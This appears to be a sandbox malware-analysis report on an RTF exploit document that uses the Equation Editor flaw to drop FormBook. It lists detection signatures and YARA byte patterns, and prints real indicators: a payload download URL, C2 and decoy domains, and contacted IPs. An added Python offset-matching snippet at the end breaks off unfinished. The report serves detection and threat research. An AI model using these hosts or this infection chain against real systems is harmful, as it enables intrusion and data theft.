
Windows Analysis Report
SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf

Overview

General Information

Sample Name:SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf
Analysis ID:1345774
MD5:db71e76c281983819c7259fd25618513
SHA1:cfbeb69bdcf67546aafabb4dfe72ad4cbec77ec3
SHA256:ddbd4b7c13d365eb339aad4d0e2deb0dff4b50287d5111f57ca8756f3746f940
Tags:rtf

Detection

FormBook, NSISDropper
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected NSISDropper
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2408 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1668 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 3148 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: B08C02AB269D1406728178E62017C3D4)
      • twbcaze.exe (PID: 3164 cmdline: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" MD5: 9C416E56B341D900E2DFEC7595CC85EE)
        • twbcaze.exe (PID: 3172 cmdline: C:\Users\user\AppData\Local\Temp\twbcaze.exe MD5: 9C416E56B341D900E2DFEC7595CC85EE)
          • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • cmstp.exe (PID: 3216 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 00263CA2071DC9A6EE577EB356B0D1D9)
              • cmd.exe (PID: 3240 cmdline: /c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 3340 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
Source | Rule | Description | Author | Strings
Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf | Rule: INDICATOR_RTF_MalVer_Objects | Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents. | Author: ditekSHen
  • 0x82:$obj2: \objdata
  • 0x68:$obj3: \objupdate
  • 0x43:$obj6: \objlink
Source | Rule | Description | Author | Strings
Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author | Strings
Source: 7.2.twbcaze.exe.400000.1.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 7.2.twbcaze.exe.400000.1.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 7.2.twbcaze.exe.400000.1.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 7.2.twbcaze.exe.400000.1.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 7.2.twbcaze.exe.400000.1.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C

          Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.224.247.210, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1668, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1668, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\balokarat2.1[1].exe
Timestamp:11/21/23-13:25:55.147417
Source IP:192.168.2.22
Destination IP:103.224.247.210
Source Port:49161
Destination Port:80
SID:2021697
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/21/23-13:26:55.450467
Source IP:192.168.2.22
Destination IP:107.164.111.101
Source Port:49165
Destination Port:80
SID:2031412
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:11/21/23-13:27:15.263664
Source IP:192.168.2.22
Destination IP:3.33.130.190
Source Port:49166
Destination Port:80
SID:2031412
Protocol:TCP
Classtype:A Network Trojan was detected


          AV Detection

Source: http://www.janenas.top/t2ti/ | Avira URL Cloud: Label: phishing
Source: http://www.albertcolet.com/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.xazeyu.net/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.hhmhhhbh.xyz | Avira URL Cloud: Label: malware
Source: http://www.maquibotanic.com/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.hhmhhhbh.xyz/t2ti/www.techsterverse.life | Avira URL Cloud: Label: phishing
Source: http://www.xazeyu.net/t2ti/www.fxzx01.icu | Avira URL Cloud: Label: malware
Source: http://www.6061k.vip/t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g== | Avira URL Cloud: Label: malware
Source: http://www.shucaimh.com/t2ti/www.6061k.vip | Avira URL Cloud: Label: malware
Source: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe | Avira URL Cloud: Label: malware
Source: http://www.janenas.top/t2ti/www.alishopogolic.com | Avira URL Cloud: Label: phishing
Source: http://www.allamericanshuttlellc.com/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.shucaimh.com/t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf | Avira URL Cloud: Label: malware
Source: http://www.6061k.vip/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.albertcolet.com/t2ti/www.guimisha.com | Avira URL Cloud: Label: malware
Source: http://www.6061k.vip/t2ti/www.xazeyu.net | Avira URL Cloud: Label: malware
Source: https://swamini.in/ | Avira URL Cloud: Label: malware
Source: http://www.techsterverse.life/t2ti/www.www32561b.com | Avira URL Cloud: Label: malware
Source: http://www.guimisha.com/t2ti/www.ssongg10292.cfd | Avira URL Cloud: Label: malware
Source: http://www.hhmhhhbh.xyz/t2ti/ | Avira URL Cloud: Label: phishing
Source: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeqqC: | Avira URL Cloud: Label: malware
Source: http://www.spacecargo.net/t2ti/www.michealwilshire.online | Avira URL Cloud: Label: malware
Source: http://www.alishopogolic.com/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.guimisha.com/t2ti/ | Avira URL Cloud: Label: malware
Source: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exeemC: | Avira URL Cloud: Label: malware
Source: http://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exej | Avira URL Cloud: Label: malware
Source: https://swamini.in/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe | Avira URL Cloud: Label: malware
Source: http://www.michealwilshire.online/t2ti/www.janenas.top | Avira URL Cloud: Label: malware
Source: http://www.www32561b.com/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.fxzx01.icu/t2ti/ | Avira URL Cloud: Label: malware
Source: www.guimisha.com/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.techsterverse.life/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.shucaimh.com/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.fxzx01.icu/t2ti/www.albertcolet.com | Avira URL Cloud: Label: malware
Source: http://www.www32561b.com/t2ti/www.spacecargo.net | Avira URL Cloud: Label: malware
Source: http://www.spacecargo.net/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.alishopogolic.com/t2ti/www.maquibotanic.com | Avira URL Cloud: Label: malware
Source: http://www.allamericanshuttlellc.com/t2ti/www.shucaimh.com | Avira URL Cloud: Label: malware
Source: http://www.michealwilshire.online/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.ssongg10292.cfd/t2ti/ | Avira URL Cloud: Label: malware
Source: http://www.ssongg10292.cfd/t2ti/www.hhmhhhbh.xyz | Avira URL Cloud: Label: malware
Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.guimisha.com/t2ti/"], "decoy": ["j6y.lat", "kindlekidz.com", "studio352events.com", "merelweb.com", "6061k.vip", "iuk242.com", "tiltedjava.net", "importmotorshickory.com", "codinnotech.com", "foodapartcupboardscript.click", "donovanmanuel.store", "michealwilshire.online", "clawenterprises.net", "spacecargo.net", "duadqps.com", "allamericanshuttlellc.com", "shucaimh.com", "qivovrj.com", "infynite1.net", "albertcolet.com", "millennium-project.net", "fxzx01.icu", "motenm.com", "cloudsolution.site", "buddyurns.com", "vxjmolopbsma.com", "cleanwipe.shop", "serviamcounseling.com", "brandonjamescreative.com", "ricohdealers.com", "fixthecat.com", "sanqiantongpao.com", "techsterverse.life", "gzshbsh.net", "abbeyannieretreat.com", "zzw.bet", "alishopogolic.com", "whoops.store", "tike-taka.com", "kaaatieharvey.com", "eresloquebebes.com", "saferspaces.net", "maxwebmarketingdigital.com", "90phutv.live", "prescribedaddiction.com", "office-honu.com", "maquibotanic.com", "www32561b.com", "allsectors.net", "hhmhhhbh.xyz", "werks.dev", "ssongg10292.cfd", "lezhiyunfu.net", "xazeyu.net", "millennialsbloghub.com", "hupkeo.link", "doconomist.net", "onlygiftkits.com", "earthdatascape.com", "3gnz.com", "janenas.top", "shoes-fl.com", "xdeh02h.xyz", "smartsettlesolutions.com"]}
Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf | ReversingLabs: Detection: 48%
Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf | Virustotal: Detection: 55%
Source: Yara match | File source: 7.2.twbcaze.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.twbcaze.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.twbcaze.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.twbcaze.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: SecuriteInfo.com.RTF.Obfuscated-gen.19663.16514.rtf | Avira: detected
Source: swamini.in | Virustotal: Detection: 18%
Source: https://swamini.in/ | Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Joe Sandbox ML: detected

          Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 103.224.247.210 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 103.224.247.210 Port: 443
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 103.224.247.210:443 -> 192.168.2.22:49162 version: TLS 1.2
          Source: Binary string: wntdll.pdb source: twbcaze.exe, twbcaze.exe, 00000007.00000002.363230284.0000000000830000.00000040.00001000.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000003.353742446.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000003.353487923.0000000000430000.00000004.00000020.00020000.00000000.sdmp, twbcaze.exe, 00000007.00000002.363230284.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000009.00000003.363443838.0000000001D20000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879405399.0000000002030000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000009.00000003.363187187.0000000001BC0000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: twbcaze.exe, 00000007.00000002.363156888.00000000002A0000.00000040.10000000.00040000.00000000.sdmp, twbcaze.exe, 00000007.00000002.363191563.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000009.00000002.879251773.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00405E93 FindFirstFileA,FindClose,5_2_00405E93
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004054BD
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00402671 FindFirstFileA,5_2_00402671
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 6_2_004203E8 _free,_free,FindFirstFileExW,6_2_004203E8
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 6_2_0042049C FindFirstFileExW,FindNextFileW,FindClose,6_2_0042049C
Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 103.224.247.210:80
Source: global traffic | TCP traffic: 103.224.247.210:80 -> 192.168.2.22:49161
Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
Source: global traffic | TCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 103.224.247.210:443
          Source: global trafficTCP traffic: 103.224.247.210:443 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 103.224.247.210:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 107.164.111.101:80 -> 192.168.2.22:49165
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.164.111.101:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 3.33.130.190:80
          Source: global trafficTCP traffic: 3.33.130.190:80 -> 192.168.2.22:49166
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 103.150.181.71:80 -> 192.168.2.22:49167
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.150.181.71:80
Source: global traffic | DNS query: name: swamini.in
Source: global traffic | DNS query: name: www.allamericanshuttlellc.com
Source: global traffic | DNS query: name: www.shucaimh.com
Source: global traffic | DNS query: name: www.6061k.vip
Source: global traffic | DNS query: name: www.xazeyu.net
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 4x nop then pop edi | 7_2_00417CE2
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 4x nop then pop edi | 7_2_00417C85
Source: C:\Users\user\AppData\Local\Temp\twbcaze.exe | Code function: 4x nop then pop edi | 7_2_00416C9B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi | 9_2_000A7C85
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi | 9_2_000A6C9B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi | 9_2_000A7CE2
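The three "4x nop then pop edi" functions reported for twbcaze.exe and the three reported for cmstp.exe sit at addresses that differ by a constant 0x370000, which is what one image mapped at two different bases looks like: the dropped payload in its own process, and the copy hollowed into cmstp.exe (the report flags process hollowing separately). The Python below is an added example and not part of the Joe Sandbox report; it turns the report's function identifiers into image-relative offsets and checks that the two sets describe the same code. The image bases 0x400000 (twbcaze.exe) and 0x90000 (the region inside cmstp.exe) are assumptions inferred from that constant difference, not values the report states; in a real triage both would be read from the PE header and the sandbox memory map.

```python
"""Added example, not part of the Joe Sandbox report: match the "4x nop then pop edi"
functions reported in twbcaze.exe against those reported in cmstp.exe by
converting the absolute addresses in the report's function identifiers to
image-relative offsets (RVAs).

Assumed, not stated by the report: twbcaze.exe is mapped at the default
32-bit image base 0x400000 and the payload hollowed into cmstp.exe at 0x90000.
The second value is inferred from the constant 0x370000 difference between the
two address sets."""

TWBCAZE_BASE = 0x400000      # assumption: default 32-bit PE image base
CMSTP_REGION_BASE = 0x90000  # assumption: inferred from the constant shift

# Function identifiers exactly as printed in the report: <pid>_<run>_<hex address>
TWBCAZE_FUNCS = ["7_2_00417CE2", "7_2_00417C85", "7_2_00416C9B"]
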